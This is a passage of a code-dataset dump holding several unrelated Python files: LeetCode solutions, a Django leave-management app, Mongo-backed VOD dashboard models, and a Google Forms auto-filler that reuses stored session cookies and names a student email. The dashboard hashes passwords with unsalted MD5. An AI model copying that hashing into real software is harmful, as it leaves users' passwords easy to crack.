__name__ == '__main__':\r\n s = Solution()\r\n print(s.permute([1,2,3]))","repo_name":"DiamondGo/leetcode","sub_path":"python/Permutations.py","file_name":"Permutations.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25349446827","text":"heart = list(map(int, input().split('@')))\r\ncommand = input()\r\n\r\nid = 0\r\nwhile command != 'Love!':\r\n jump, ind = command.split()\r\n id += int(ind)\r\n if id >= len(heart):\r\n id = 0\r\n #print(id)\r\n if heart[id] == 0:\r\n print(f\"Place {id} already had Valentine's day.\")\r\n else:\r\n heart[id] -= 2\r\n if heart[id] == 0:\r\n print(f\"Place {id} has Valentine's day.\")\r\n #print(heart)\r\n command = input()\r\n\r\nif command == 'Love!':\r\n print(f\"Cupid's last position was {id}.\")\r\n if sum(heart) == 0:\r\n print('Mission was successful.')\r\n else:\r\n fail = [x for x in heart if x != 0]\r\n print(f\"Cupid has failed {len(fail)} places.\")","repo_name":"danilovabg/FundamentalsSoftUni","sub_path":"MID EXAM/04. Programming Fundamentals Mid Exam/03. Heart Delivery.py","file_name":"03. Heart Delivery.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25810735915","text":"\"\"\"Navigator dock widget and functionality\n\"\"\"\n\nimport os.path\nimport collections\nimport queue\n\nfrom PyQt5.QtCore import pyqtSignal, QObject, QThread, QTimer\nfrom PyQt5.QtWidgets import QFileDialog, QWidget\nfrom PyQt5.QtGui import QIcon\nfrom PyQt5 import uic\n\n\nfrom enki.core.core import core\nfrom enki.core.uisettings import TextOption, CheckableOption\nimport enki.lib.get_console_output as gco\n\nfrom . import ctags\nfrom .dock import NavigatorDock\n\n\n# source map. 1 ctags language is mapped to multiply Qutepart languages\n# NOTE this map must be updated after new languages has been added to ctags or Qutepart\n# Initially filled on Qutepart 1.1.0 and Ctags 5.9~svn20110310\n_CTAGS_TO_QUTEPART_LANG_MAP = {\n \"Asm\": (\"AVR Assembler\", \"GNU Assembler\", \"MIPS Assembler\",\n \"Asm6502\", \"Intel x86 (NASM)\", \"Motorola 68k (VASM/Devpac)\", \"PicAsm\"),\n \"Asp\": (\"ASP\",),\n \"Awk\": (\"AWK\",),\n \"Basic\": (\"FreeBASIC\", \"KBasic\", \"MonoBasic\", \"PureBasic\", \"TI Basic\"),\n \"C\": (\"C\",),\n \"C#\": (\"C#\",),\n \"C++\": (\"C++\",),\n \"DosBatch\": (\"MS-DOS Batch\",),\n \"Eiffel\": (\"Eiffel\",),\n \"Erlang\": (\"Erlang\",),\n \"Flex\": (\"Lex/Flex\",),\n \"Fortran\": (\"Fortran\",),\n \"Go\": (\"Go\",),\n \"HTML\": (\"Django HTML Template\", \"HTML\", \"Ruby/Rails/RHTML\"),\n \"Java\": (\"Java\",),\n \"JavaScript\": (\"JavaScript\",),\n \"Lisp\": (\"Common Lisp\",),\n \"Lua\": (\"Lua\",),\n \"Make\": (\"Makefile\",),\n \"Matlab\": (\"Matlab\",),\n \"ObjectiveC\": (\"Objective-C\", \"Objective-C++\"),\n \"OCaml\": (\"Objective Caml\",),\n \"Pascal\": (\"Pascal\",),\n \"Perl\": (\"Perl\",),\n \"PHP\": (\"PHP/PHP\", \"PHP (HTML)\"),\n \"Python\": (\"Python\",),\n \"REXX\": (\"REXX\",),\n \"Ruby\": (\"Ruby\",),\n \"Scheme\": (\"Scheme\",),\n \"Sh\": (\"Zsh\", \"Bash\"),\n \"SML\": (\"SML\",),\n \"SQL\": (\"SQL\", \"SQL (MySQL)\", \"SQL (PostgreSQL)\"),\n \"Tcl\": (\"Tcl/Tk\",),\n \"Tex\": (\"LaTeX\", \"Texinfo\"),\n \"Vera\": (\"Vera\",),\n \"Verilog\": (\"Verilog\",),\n \"VHDL\": (\"VHDL\",),\n \"YACC\": (\"Yacc/Bison\",)\n}\n\n\n# build reverse map\n_QUTEPART_TO_CTAGS_LANG_MAP = {}\nfor ctagsLang, qutepartLangs in _CTAGS_TO_QUTEPART_LANG_MAP.items():\n for qutepartLang in qutepartLangs:\n _QUTEPART_TO_CTAGS_LANG_MAP[qutepartLang] = ctagsLang\n\n\nclass ProcessorThread(QThread):\n \"\"\"Thread processes text with ctags and returns tags\n \"\"\"\n tagsReady = pyqtSignal(list)\n error = pyqtSignal(str)\n\n _Task = collections.namedtuple(\"Task\", [\"ctagsLang\", \"text\", \"sortAlphabetically\"])\n\n def __init__(self):\n QThread.__init__(self)\n self._queue = queue.Queue()\n self.start(QThread.LowPriority)\n\n def process(self, ctagsLang, text, sortAlphabetically):\n \"\"\"Parse text and emit tags\n \"\"\"\n self._queue.put(self._Task(ctagsLang, text, sortAlphabetically))\n\n def stopAsync(self):\n self._queue.put(None)\n\n def run(self):\n \"\"\"Thread function\n \"\"\"\n while True: # exits with break\n # wait task\n task = self._queue.get()\n # take the last task\n while self._queue.qsize():\n task = self._queue.get()\n\n if task is None: # None is a quit command\n break\n\n try:\n tags = ctags.processText(task.ctagsLang, task.text, task.sortAlphabetically)\n except ctags.FailedException as ex:\n self.error.emit(ex.args[0])\n else:\n if not self._queue.qsize(): # Do not emit results, if having new task\n self.tagsReady.emit(tags)\n\n\nclass SettingsWidget(QWidget):\n \"\"\"Settings widget. Insertted as a page to UISettings\n \"\"\"\n\n def __init__(self, *args):\n QWidget.__init__(self, *args)\n uic.loadUi(os.path.join(os.path.dirname(__file__), 'Settings.ui'), self)\n self.pbCtagsPath.clicked.connect(self._onPbCtagsPathClicked)\n self.leCtagsPath.textChanged.connect(self._updateExecuteError)\n\n def _onPbCtagsPathClicked(self):\n path, _ = QFileDialog.getOpenFileName(core.mainWindow(), 'Ctags path')\n if path:\n self.leCtagsPath.setText(path)\n\n def _updateExecuteError(self, path):\n \"\"\" Check if pylint is installed.\n\n Return None if OK or textual error\n \"\"\"\n try:\n stdout, stderr = gco.get_console_output([path, '--version'])\n except OSError as ex:\n self.lExecuteError.setText('Failed to execute ctags: {}'.format(ex))\n else:\n if 'Exuberant Ctags' in stdout:\n self.lExecuteError.setText('ctags is found!')\n elif 'GNU Emacs' in stdout:\n self.lExecuteError.setText(\n 'You are trying to use etags from the Emacs package, but it is not supported. Use Exuberant Ctags.')\n\n\nclass Plugin(QObject):\n \"\"\"Main class. Interface for the core.\n \"\"\"\n\n def __init__(self):\n QObject.__init__(self)\n self._dock = None\n core.workspace().currentDocumentChanged.connect(self._onDocumentChanged)\n core.workspace().textChanged.connect(self._onTextChanged)\n\n core.uiSettingsManager().aboutToExecute.connect(self._onSettingsDialogAboutToExecute)\n core.uiSettingsManager().dialogAccepted.connect(self._scheduleDocumentProcessing)\n\n # If we update Tree on every key pressing, freezes are sensible (GUI thread draws tree too slowly\n # This timer is used for drawing Preview 1000 ms After user has stopped typing text\n self._typingTimer = QTimer()\n self._typingTimer.setInterval(1000)\n self._typingTimer.setSingleShot(True)\n self._typingTimer.timeout.connect(self._scheduleDocumentProcessing)\n\n self._thread = ProcessorThread()\n\n def terminate(self):\n \"\"\"Uninstall the plugin\n \"\"\"\n if self._dock is not None:\n self._thread.tagsReady.disconnect(self._dock.setTags)\n self._thread.error.disconnect(self._dock.onError)\n self._dock.remove()\n self._dock.term()\n self._typingTimer.stop()\n self._thread.stopAsync()\n self._thread.wait()\n\n core.workspace().currentDocumentChanged.disconnect(self._onDocumentChanged)\n core.workspace().textChanged.disconnect(self._onTextChanged)\n core.uiSettingsManager().aboutToExecute.disconnect(self._onSettingsDialogAboutToExecute)\n core.uiSettingsManager().dialogAccepted.disconnect(self._scheduleDocumentProcessing)\n\n def _createDock(self):\n self._dock = NavigatorDock()\n self._dock.setVisible(False)\n self._dock.shown.connect(self._onDockShown)\n self._dock.closed.connect(self._onDockClosed)\n\n self._thread.tagsReady.connect(self._dock.setTags)\n self._thread.error.connect(self._dock.onError)\n\n def _isEnabled(self):\n return core.config()['Navigator']['Enabled']\n\n def _isSupported(self, document):\n return document is not None and \\\n document.qutepart.language() in _QUTEPART_TO_CTAGS_LANG_MAP\n\n def _onDockClosed(self):\n \"\"\"Dock has been closed by a user. Change Enabled option\n \"\"\"\n if core.config()['Navigator']['Enabled']:\n core.config()['Navigator']['Enabled'] = False\n core.config().flush()\n self._dock.setTags([])\n\n def _onDockShown(self):\n \"\"\"Dock has been shown by a user. Change Enabled option\n \"\"\"\n if not core.config()['Navigator']['Enabled']:\n core.config()['Navigator']['Enabled'] = True\n core.config().flush()\n self._scheduleDocumentProcessing()\n\n def _onDocumentChanged(self, old, new):\n if self._isSupported(new):\n if self._dock is None:\n self._createDock()\n self._dock.install()\n if self._isEnabled():\n self._dock.show()\n self._scheduleDocumentProcessing()\n else:\n self._clear()\n if self._dock is not None:\n self._dock.remove()\n\n def _onTextChanged(self):\n if self._isEnabled():\n self._typingTimer.stop()\n self._typingTimer.start()\n\n def _clear(self):\n if self._dock is not None:\n self._dock.setTags([])\n\n def _scheduleDocumentProcessing(self):\n \"\"\"Start document processing with the thread.\n \"\"\"\n self._typingTimer.stop()\n\n document = core.workspace().currentDocument()\n if document is not None and \\\n document.qutepart.language() in _QUTEPART_TO_CTAGS_LANG_MAP:\n ctagsLang = _QUTEPART_TO_CTAGS_LANG_MAP[document.qutepart.language()]\n self._thread.process(ctagsLang, document.qutepart.text,\n core.config()['Navigator']['SortAlphabetically'])\n\n def _onSettingsDialogAboutToExecute(self, dialog):\n \"\"\"UI settings dialogue is about to execute.\n Add own options\n \"\"\"\n widget = SettingsWidget(dialog)\n\n dialog.appendPage(\"Navigator\", widget, QIcon(':/enkiicons/goto.png'))\n\n # Options\n dialog.appendOption(TextOption(dialog, core.config(),\n \"Navigator/CtagsPath\", widget.leCtagsPath))\n dialog.appendOption(CheckableOption(dialog, core.config(),\n \"Navigator/SortAlphabetically\",\n widget.cbSortTagsAlphabetically))\n","repo_name":"andreikop/enki","sub_path":"enki/plugins/navigator/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":9380,"program_lang":"python","lang":"en","doc_type":"code","stars":161,"dataset":"github-code","pt":"21"} +{"seq_id":"29551839969","text":"from django.shortcuts import render, redirect, reverse\nfrom . models import * \nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom accounts.forms import NewLeaveForm\n\n@login_required(login_url='login/')\ndef staffDashboard(request):\n user = request.user \n staff = user.staff\n leaves = Leave.objects.filter(staff=staff).all()\n context = {'leaves': leaves}\n return render(request, 'staffDashboard.html', context)\n\n\n@login_required(login_url='login/')\ndef new_leave(request):\n user = request.user\n staff = user.staff\n\n form = NewLeaveForm()\n\n if request.method == \"POST\":\n form = NewLeaveForm(request.POST)\n if form.is_valid():\n leave = form.save(commit=False)\n leave.staff = staff\n leave.save()\n return redirect(reverse('staffDashboard'))\n\n context = {'form': form}\n return render(request, 'new_leave.html', context)\n\n\n@login_required(login_url='login/')\ndef view_leave(request, leave_id):\n user = request.user\n staff = user.staff \n leave = Leave.objects.filter(staff=staff).get(id=leave_id)\n\n context = {'leave': leave}\n return render(request, 'view_leave.html', context)\n\n\n@login_required(login_url='login/')\ndef approved_leaves(request):\n user = request.user\n staff = user.staff\n approved_leaves = Leave.objects.filter(staff=staff, status=True)\n context = {'approved_leaves': approved_leaves}\n return render(request, 'approved.html', context)\n\n@login_required(login_url='login/')\ndef pending_leaves(request):\n user = request.user\n staff = user.staff\n pending_leaves = Leave.objects.filter(staff=staff, status=False)\n context = {'pending_leaves': pending_leaves}\n return render(request, 'pending.html', context)","repo_name":"Muftawu/LeaveManagementSystem","sub_path":"leave/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31347471547","text":"#this file is about lab tests on AWS S3. \n\nimport boto3\n\naws_mg_con = boto3.session.Session(profile_name = \"py-bot\", region_name = \"us-east-1\")\ns3=aws_mg_con.client(\"s3\")\n\nprint(dir(s3))\n\n#testing tghe changes done in the file. \n","repo_name":"dev-ahuja/narendra-python","sub_path":"S3.py","file_name":"S3.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74212867573","text":"class Solution:\n def canConstruct(self, ransomNote: str, magazine: str) -> bool:\n ransomCounter=Counter(ransomNote)\n \n for note,count in ransomCounter.items():\n if note in magazine:\n if count>magazine.count(note):\n return False\n else:\n return False\n return True \n","repo_name":"harshit28/Leetcode","sub_path":"ransomnote.py","file_name":"ransomnote.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14399831328","text":"import hashlib\nimport random\nimport string\nfrom typing import Optional, Literal, List\n\nimport jose\nfrom bson import ObjectId\nfrom bson.errors import BSONError\nfrom jose import jwt\nfrom pydantic import BaseModel, Field\n\nfrom config.queries import Query\nfrom datetime import datetime\n\nfrom config.settings import SECRET_KEY\nfrom config.utils import datetime_now, convert_datetime_to_date_hourly\nfrom config.settings import db # # # Do Not Delete This Import\n\n\nclass BsonObjectId(ObjectId):\n @classmethod\n def __get_validators__(cls):\n yield cls.validate\n\n @classmethod\n def validate(cls, v):\n if isinstance(v, str):\n try:\n ObjectId(v)\n except BSONError:\n raise TypeError('Invalid ObjectId')\n elif not isinstance(v, ObjectId):\n raise TypeError('ObjectId required')\n return str(v)\n\n\nclass Access(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n access: Literal[\n 'AddAdmin', 'ModifyAdmin', ' ViewAdmin', 'EditDashboardProfile', 'ViewAccessGroup', 'AddAccessGroup',\n 'AddProvider', 'ModifyProvider', 'ViewProvider']\n\n\nclass AccessGroup(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n title: str\n accesses: list\n\n\nclass Provider(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n dc_id: str # data center id which is in DataCenterServer table\n logo_file_id: str # file id which is in File table\n url: str # Relative URL which becomes complete by dc download_url in ServerInfo table\n\n\nclass Admin(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n username: str\n password: str\n super_admin: bool = False\n email: Optional[str]\n title: Optional[str]\n avatar_id: Optional[str]\n access_group_ids: Optional[List]\n last_access_time: datetime = datetime_now()\n status: Literal['Active', 'Deactive'] = 'Active'\n provider_id: Optional[str]\n\n @property\n def is_super_admin(self):\n return self.super_admin\n\n @property\n def _id(self):\n return ObjectId(self.id) if self.id else None\n\n def check_password(self, raw_password: str):\n return self.password == hashlib.md5(raw_password.encode('utf-8')).hexdigest()\n\n @classmethod\n def make_password(cls, raw_password):\n return hashlib.md5(raw_password.encode('utf-8')).hexdigest()\n\n\nclass DataCenterInfo(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n download_url: str\n upload_url: str\n\n\nclass File(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n dc_id: str\n status: Literal['Draft', 'Done']\n type: Literal['Avatar', 'Logo', 'Poster', 'Image']\n secret: str\n download_url: str\n extension: str\n size: int\n name: str\n\n @classmethod\n def make_secret(cls):\n return ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(15))\n\n @classmethod\n def uploader_check_hash(cls, key):\n try:\n return jwt.decode(key, SECRET_KEY)\n except jose.exceptions.JWTError as e:\n raise ValueError('secret key is not valid')\n\n @classmethod\n def update_source_files_id(cls, type, source_id, file_id):\n if type == 'Avatar':\n res = Admin.update_one({'_id': source_id}, avatar_id=file_id)\n if res.modified_count == 0:\n res = Person.update_one({'_id': source_id}, avatar_id=file_id)\n return res.modified_count\n if type == 'Logo':\n res = Provider.update_one({'_id': source_id}, logo_file_id=file_id)\n return res.modified_count\n if type == 'Poster':\n res = Content.update_one({'_id': source_id}, poster_id=file_id)\n return res.modified_count\n if type == 'Image':\n content = Content.get_one(_id=source_id)\n if len(content.images_id) >= 10:\n Content.update_variable({'_id': source_id}, {'$pop': {'images_id': -1}})\n res = Content.update_variable({'_id': source_id}, {'$push': {'images_id': file_id}})\n return res.modified_count\n\n @classmethod\n def uploader_make_hash(cls, secret, dc_id, source_id, type, file_id):\n data = {\n 'secret': secret,\n 'dc_id': dc_id,\n 'source_id': source_id,\n 'type': type,\n 'file_id': file_id\n }\n return jwt.encode(data, SECRET_KEY, algorithm='HS256')\n\n\nclass Genre(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n\n\nclass Tag(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n\n\n# TODO clear category Enum or Model\nclass Category(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n name: str\n\n\nclass Content(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id', default=None)\n title: str\n type: Literal['Movie', 'SeriesEpisode', 'NewSeries'] = ''\n series_id: Optional[str]\n season: Optional[int]\n episode: Optional[int]\n summery: str\n language: Literal['Persian', 'English']\n genre: List[str]\n # TODO clear category Enum or Model\n # category: str\n age: Literal['Adults', 'Children', 'Both']\n director_id: str\n producer_id: str\n persons_id: Optional[List[str]]\n actors_id: list\n IMDB_link: Optional[str]\n tags: Optional[List[str]]\n\n status: Literal['Uploading', 'AwaitingConfirmation', 'Published', 'Deleted', 'Rejected', 'IsSeries'] = 'IsSeries'\n status_description: Optional[str]\n\n poster_id: Optional[str] = []\n images_id: Optional[list] = []\n\n length: Optional[str] = \"00:00:00\" # 03:00:10\n publish_datetime: Optional[datetime] = datetime_now()\n\n admin_id: str\n provider_id: str\n\n MCI_traffic: Optional[float] = 0.0\n MTN_traffic: Optional[float] = 0.0\n Other_traffic: Optional[float] = 0.0\n total_traffic: Optional[float] = 0.0\n\n\nclass Person(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n full_name: str\n role: Literal['Director', 'Producer', 'Actor', 'Other']\n avatar_id: str\n\n\nclass ContentAccessLog(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n content_id: str\n provider_id: str\n date_hourly: str # \"2022-10-12-23\"\n isp_name: Literal['MCI', 'MTN', 'Other']\n accessed_bytes: int\n traffic_factor: float = 1 # 1/traffic_factor per day\n\n @classmethod\n def traffic_pipline(cls, start_time, end_time, provider_id, content_id):\n match_list = [{'$and': [\n {'date_hourly': {\n '$gt': convert_datetime_to_date_hourly(start_time),\n '$lt': convert_datetime_to_date_hourly(end_time)\n }},\n ]}]\n if provider_id:\n match_list.append({'provider_id': {'$eq': provider_id}})\n if content_id:\n match_list.append({'content_id': {'$eq': content_id}})\n sort = {'$sort': {'date_hourly': -1}}\n group_list = [{'$group': {\n '_id': {'isp_name': '$isp_name'},\n 'isp_name': {'$first': '$isp_name'},\n 'date_hourly': {'$push': '$date_hourly'},\n 'accessed_bytes': {\n '$push': {'$multiply': ['$traffic_factor', '$accessed_bytes']}\n }}}]\n project = {'_id': 0, 'data': 0}\n return match_list, group_list, project, 'date_hourly', 'isp_name'\n\n @classmethod\n def get_total_traffic(cls, start_time, end_time, provider_id, content_id):\n return cls.aggregate(*cls.traffic_pipline(start_time, end_time, provider_id, content_id), skip=None, limit=None)\n\n\nclass TotalTraffic(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n date_hourly: str # \"2022-10-12-23\"\n isp_name: Literal['MCI', 'MTN', 'Other']\n accessed_bytes: int\n traffic_factor: float = 1\n\n @classmethod\n def get_total_traffic(cls, start_time, end_time):\n return cls.aggregate(*ContentAccessLog.traffic_pipline(start_time, end_time, None, None), None, None)\n\n\nclass ContentAccessCountLog(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n content_id: str\n quality: str\n segment: str\n date_hourly: str\n access_count: int\n traffic_factor: float = 1\n\n\nclass ContentSegmentCount(BaseModel, Query):\n id: BsonObjectId = Field(alias='_id')\n content_id: str\n segment: str\n quality: str\n access_count: int\n","repo_name":"nargessalehi98/vod-dashboard","sub_path":"config/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42042257962","text":"# Imported Lib\nimport json\nfrom difflib import get_close_matches\n\n# Data Reading from the Json file (Function)\ndata = json.load(open(\"data.json\"))\n\n\ndef search(user_input):\n user_input = user_input.lower()\n if user_input in data:\n return data[user_input]\n elif user_input.title() in data:\n return data[user_input.title()]\n elif user_input.upper() in data:\n return data[user_input.upper()]\n # To find a close match\n elif len(get_close_matches(user_input, data.keys())) > 0:\n close_word = get_close_matches(user_input, data.keys())[0]\n response = input(\"Did you mean '%s' instead? (Y/N) \" % close_word)\n if response == \"Y\":\n return data[close_word]\n elif response == \"N\":\n return \"Sorry we couldn't help you!! \"\n else:\n return \"Please Enter (Y) if Yes, or (N) if No\"\n else:\n return \"The Word Doesn't exist, Please Double check it\"\n\n\n# User Interfacing\nuser_input = input(\"Enter Word: \")\n\n# output\noutputs = search(user_input)\n\nif type(outputs) == list:\n for output in outputs:\n print(output)\nelse:\n print(output)\n","repo_name":"MElGabaly/Interactive-English-Dictionary","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"18710505131","text":"import requests\nimport json\n\n\njson_request = {\n\n 'username': 'ahmad299934',\n 'name': 'ahmad',\n 'last_name': 'rmz',\n 'password': '12345',\n 'phone_number': '12345',\n 'national_code': '4125963214578',\n 'address': 'znj',\n 'house_number': '3347582695',\n 'drug_hist': True,\n 'decease_hist': False,\n 'doctor': 'sosan',\n 'offline_number':0,\n\n}\n\n\nsrc = 'http://127.0.0.1:8000/Core/'\n\nr = requests.post(src + 'signup/customer/', json=json_request, headers={'Authorization':'barear 1'})\n\nres_data = r.json()\npretty_json = json.dumps(res_data, indent=4)\n\nprint('\\nStatus Code : ', r.status_code)\nprint('\\n\\nResponse JSON : \\n\\n', pretty_json)\n","repo_name":"rezabhm/Laser-Back-End","sub_path":"Test/Core/SignUpCustomer.py","file_name":"SignUpCustomer.py","file_ext":"py","file_size_in_byte":667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39799365554","text":"# sequence, k = [1, 2, 3, 4, 5, 6, 7], 5\nsequence, k = [1, 2, 3, 4, 5], 7\n# sequence, k = [2, 2, 2, 2, 2], 6\n# sequence, k = [1,1,1,1,1,1,1], 7\n# sequence, k = [7,5,5,1,1,50,50], 100\n\ndef solution(sequence, k):\n answer = []\n s, e, sum = 0, 0, sequence[0]\n len_min = len(sequence)\n\n while e < len(sequence):\n if sum == k:\n if e-s < len_min:\n len_min = e-s\n answer =[]\n answer.append([s, e])\n sum -= sequence[s]\n s += 1\n\n elif sum > k:\n sum -= sequence[s]\n s += 1\n\n else:\n e += 1\n if e == len(sequence):\n break\n sum += sequence[e]\n\n return sorted(answer, key=lambda x: x[0])[0]\n\nprint(solution(sequence, k))","repo_name":"cheol-95/Algorithm","sub_path":"re-start/035. 연속된 부분 수열의 합.py","file_name":"035. 연속된 부분 수열의 합.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15627848690","text":"def bubble_sort(items):\n \"\"\"\n Return the items sorted using the bubble sort algorithm\n\n >>> bubble_sort([1,4,3,2,6])\n [1, 2, 3, 4, 6]\n\n >>> bubble_sort([9,1,-1,0,4,3])\n [-1, 0, 1, 3, 4, 9]\n\n >>> bubble_sort([3,1,0,1,-4,3])\n [-4, 0, 1, 1, 3, 3]\n\n \"\"\"\n n = len(items)\n for i in range(n-1):\n for j in reversed(range(i+1, n)):\n if items[j] < items[j-1]:\n items[j-1], items[j] = items[j], items[j-1]\n return items\n\nif __name__ == \"__main__\":\n import doctest\n doctest.testmod()\n","repo_name":"bencornelis/clrs-solutions","sub_path":"algorithms/bubble_sort.py","file_name":"bubble_sort.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27803937145","text":"#\n# @lc app=leetcode.cn id=169 lang=python3\n#\n# [169] 多数元素\n#\n\n# @lc code=start\nclass Solution:\n def majorityElement(self, nums: List[int]) -> int:\n res = None\n count = 0\n for n in nums:\n if count == 0:\n res = n\n if res == n:\n count += 1\n else:\n count -= 1\n return res\n# @lc code=end\n\n","repo_name":"zhiweiguo/davidzguo_leetcode","sub_path":"169.多数元素.py","file_name":"169.多数元素.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21228138000","text":"import requests\nimport bs4\nimport json\nimport pickle\nimport os.path\nimport dump_cookies\n\nquestion_types = {\n 0: \"short_answer\",\n 1: \"paragraph\",\n 2: \"multiple_choice\",\n 4: \"checkboxes\",\n 3: \"dropdown\",\n 8: \"section_title\",\n 11: \"weird_thing\"\n}\n\ndef analyze (token, info):\n pprint = lambda shit: print (json.dumps (shit, indent = 2))\n\n url = f\"https://docs.google.com/forms/d/e/{token}/viewform\"\n cookie_file_path = f\"cookies/{info [0]}.p\"\n if not os.path.isfile (cookie_file_path): dump_cookies.dump_cookies (info [0])\n with open (f\"cookies/{info [0]}.p\", \"rb\") as cookie_file:\n jar = pickle.load (cookie_file)\n response = requests.get (url, cookies = jar).text\n html = bs4.BeautifulSoup (response, \"html.parser\")\n if html.title.string == \"Page Not Found\":\n raise Exception (\"Invalid token!\")\n script_tags = list (html.find_all (\"script\"))\n last_script_tag = script_tags [-2].string\n BEGINNING = \"var FB_PUBLIC_LOAD_DATA_ = \"\n END = \"\\n;\"\n last_script_tag = last_script_tag [len (BEGINNING):(len (last_script_tag) - len (END))]\n free_bird_public_load_data = json.loads (last_script_tag)\n # (These indices are extracted from a dump of a test form's HTML)\n detailed_info = free_bird_public_load_data [1]\n # noinspection PyUnusedLocal\n description = detailed_info [0]\n questions = detailed_info [1]\n # noinspection PyUnusedLocal\n name = detailed_info [8]\n # print (f\"Description: {description}, name: {name}\")\n out_questions = []\n section_count = 1\n for in_question in questions:\n question = {\n \"id\": in_question [0],\n \"name\": in_question [1]\n }\n if in_question [3] in question_types:\n question [\"type\"] = question_types [in_question [3]]\n else:\n question [\"type\"] = \"unknown\"\n if question [\"type\"] == \"weird_thing\": continue\n if question [\"type\"] == \"section_title\":\n section_count += 1\n continue\n question [\"answer_info\"] = in_question [4]\n out_questions.append (question)\n\n response_body = {}\n\n name = info [1].split (\" \")\n cohort_number = info [2]\n\n # info is in the format [\"reed.eric2022@istemghs.org\", \"Eric Reed\", \"Petrecca\", \"More gaming would be cool\"]\n\n draft = []\n\n # noinspection PyUnusedLocal\n def add_normal (_answer_id, answer_value):\n response_body [f\"entry.{_answer_id}\"] = answer_value\n def add_draft (_answer_id, answer_value):\n draft.append ([None, _answer_id, [answer_value], 0])\n add = add_draft\n\n for question in out_questions:\n answer_id = question ['answer_info'] [0] [0]\n lower_name = question [\"name\"].lower ()\n type_is = lambda check_type: question [\"type\"] == check_type\n def is_yes_no (lenient = False):\n if not type_is (\"multiple_choice\"): return False\n _answer_list = question [\"answer_info\"] [0] [1]\n return _answer_list [0] [0] == \"Yes\" and (_answer_list [1] [0] == \"No\" or lenient)\n print (f\"Question ID: {question ['id']}\")\n print (f\"Answer ID: {answer_id}\")\n print (f\"Lowercase name: {lower_name}\")\n print (f\"Type: {question ['type']}\")\n\n if \"first\" in lower_name and \"name\" in lower_name and type_is (\"short_answer\"):\n print (f\"DETECTED FIRST NAME, setting {answer_id} to {name [0]}\")\n add (answer_id, name [0])\n elif \"last\" in lower_name and \"name\" in lower_name and type_is (\"short_answer\"):\n print (f\"DETECTED LAST NAME, setting {answer_id} to {name [1]}\")\n add (answer_id, name [1])\n elif \"cohort\" in lower_name and type_is (\"multiple_choice\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if cohort_number in answer [0].lower ():\n selected = answer [0]\n if selected is None: raise Exception (\"couldn't find selected\")\n print (f\"DETECTED COHORT SELECTION: {selected}\")\n add (answer_id, selected)\n elif \"ccp\" in lower_name and type_is (\"multiple_choice\"):\n print (\"DETECTED CCP\")\n add (answer_id, \"No\")\n elif \"understand\" in lower_name and is_yes_no (lenient = True):\n print (\"DETECTED UNNECESSARY CONFIRMATION\")\n add (answer_id, \"Yes\")\n elif \"breakout\" in lower_name and not \"second\" in lower_name and not \"third\" in lower_name and type_is (\"dropdown\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if info [3] [0].lower () in answer [0].lower ():\n selected = answer [0]\n if selected is None:\n print (\"Taken, choosing alternative (default)\")\n selected = answer_list [0] [0]\n add (answer_id, selected)\n print (f\"DETECTED BREAKOUT SELECT, returning {selected}\")\n elif \"first\" in lower_name and is_yes_no ():\n print (\"DETECTED FIRST VALIDATION\")\n add (answer_id, \"Yes\")\n elif \"second\" in lower_name and not \"third\" in lower_name and type_is (\"dropdown\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if info [3] [1].lower () in answer [0].lower ():\n selected = answer [0]\n if selected is None:\n print (\"Taken, choosing alternative (default)\")\n selected = answer_list [0] [0]\n add (answer_id, selected)\n print (f\"DETECTED SECONDARY BREAKOUT SELECT, returning {selected}\")\n elif \"third\" in lower_name and type_is (\"dropdown\"):\n answer_list = question [\"answer_info\"] [0] [1]\n selected = None\n for answer in answer_list:\n if info [3] [2].lower () in answer [0].lower ():\n selected = answer [0]\n if selected is None:\n print (\"Taken, choosing alternative (default)\")\n selected = 